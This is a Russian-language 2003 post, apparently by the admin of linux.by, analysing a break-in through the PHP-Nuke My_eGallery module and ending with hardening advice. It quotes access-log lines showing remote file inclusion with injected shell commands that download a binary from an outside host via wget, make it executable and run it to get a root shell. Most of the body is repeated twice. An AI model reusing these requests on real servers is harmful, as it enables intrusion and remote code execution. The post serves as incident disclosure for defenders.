Как ломали www.linux.by
Добавлено: 15 дек 2003, 22:25
Ломал этот сервер некий кул-хацкар, использующий серверы в Бразилии. Хакера зовут PsychoPhobia, можете через гугл полюбоваться на "тоску" его достижений. Вот пример того, что происходило (и это далеко не все):
200.98.117.45 - - [12/Dec/2003:08:46:15 +0200] "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http://www.jesusaleluia.iwebland.com/dcphp3.gif?
&cmd=cd%20/home/hosts/linux/linux.by/www/www.linux.by;lynx%20-source%20http://hack0.tripod.com.br/cgi%20>%20cgi
HTTP/1.1" 200 19596
Пытаемся залит файл cgi с помощью lynx. Эта команда на прошла.
200.98.117.45 - - [12/Dec/2003:08:47:52 +0200] "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http://www.jesusaleluia.iwebland.com/dcphp3.gif?
&cmd=cd%20/tmp;wget%20http://hack0.tripod.com.br/cgi HTTP/1.1" 200 1825
Здесь пытаемся залить с помощью wget. А вот эта успешно завершилась. Ее
результат - появление на сервере в каталоге /tmp файла cgi.
200.98.117.45 - - [12/Dec/2003:08:48:12 +0200] "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http://www.jesusaleluia.iwebland.com/dcphp3.gif?
&cmd=cd%20/tmp;chmod%20+x%20cgi HTTP/1.1" 200 1544
Здесь пытаемся дать права на исполнение файлу, но опять-таки - не
проканало.
200.98.117.45 - - [12/Dec/2003:08:48:19 +0200] "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http://www.jesusaleluia.iwebland.com/dcphp3.gif?
&cmd=cd%20/tmp;chmod%20777%20cgi HTTP/1.1" 200 1512
А вот эта команда изменила права на файл /tmp/cgi на 777
200.98.117.45 - - [12/Dec/2003:08:48:24 +0200] "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http://www.jesusaleluia.iwebland.com/dcphp3.gif?
&cmd=cd%20/tmp;./cgi HTTP/1.1" 200 1564
А этой командой мы запустили файл на исполнение. Все - висим в памяти и
слушаем порт 44464. Далее заходим телнетом на порт и получаем рутовую консоль.
Таким-же образом хакер запускал сервер телнета и проделывал всякие-разные нехорошие штуки. Но к сожалению он обломался. Сейчас-же дыры еще более законопачены. Более того, XStranger в процессе смены движка сайта.
Резюме, так сказать. Уважаемые господа, если у кого есть хосты под Linux с
реальными адресами, на которых запущен Apache и есть навороченные
средства управления контентом сайтов и т.п. - срочно обновляйте ядро. Именно это и надо делать в первую очередь, особенно тем, кто считает что
BRK эксплоит сугубо локальный. А еще, затыкайте пхпнюк, или как минимум, выставляйие safemode в php.ini.
200.98.117.45 - - [12/Dec/2003:08:46:15 +0200] "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http://www.jesusaleluia.iwebland.com/dcphp3.gif?
&cmd=cd%20/home/hosts/linux/linux.by/www/www.linux.by;lynx%20-source%20http://hack0.tripod.com.br/cgi%20>%20cgi
HTTP/1.1" 200 19596
Пытаемся залит файл cgi с помощью lynx. Эта команда на прошла.
200.98.117.45 - - [12/Dec/2003:08:47:52 +0200] "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http://www.jesusaleluia.iwebland.com/dcphp3.gif?
&cmd=cd%20/tmp;wget%20http://hack0.tripod.com.br/cgi HTTP/1.1" 200 1825
Здесь пытаемся залить с помощью wget. А вот эта успешно завершилась. Ее
результат - появление на сервере в каталоге /tmp файла cgi.
200.98.117.45 - - [12/Dec/2003:08:48:12 +0200] "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http://www.jesusaleluia.iwebland.com/dcphp3.gif?
&cmd=cd%20/tmp;chmod%20+x%20cgi HTTP/1.1" 200 1544
Здесь пытаемся дать права на исполнение файлу, но опять-таки - не
проканало.
200.98.117.45 - - [12/Dec/2003:08:48:19 +0200] "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http://www.jesusaleluia.iwebland.com/dcphp3.gif?
&cmd=cd%20/tmp;chmod%20777%20cgi HTTP/1.1" 200 1512
А вот эта команда изменила права на файл /tmp/cgi на 777
200.98.117.45 - - [12/Dec/2003:08:48:24 +0200] "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http://www.jesusaleluia.iwebland.com/dcphp3.gif?
&cmd=cd%20/tmp;./cgi HTTP/1.1" 200 1564
А этой командой мы запустили файл на исполнение. Все - висим в памяти и
слушаем порт 44464. Далее заходим телнетом на порт и получаем рутовую консоль.
Таким-же образом хакер запускал сервер телнета и проделывал всякие-разные нехорошие штуки. Но к сожалению он обломался. Сейчас-же дыры еще более законопачены. Более того, XStranger в процессе смены движка сайта.
Резюме, так сказать. Уважаемые господа, если у кого есть хосты под Linux с реальными адресами, на которых запущен Apache и есть навороченные
средства управления контентом сайтов и т.п. - срочно обновляйте ядро. Именно это и надо делать в первую очередь, особенно тем, кто считает что
BRK эксплоит сугубо локальный. А еще, затыкайте пхпнюк, или как минимум, выставляйие safemode в php.ini.
Все, делаю новый движок на linux.by...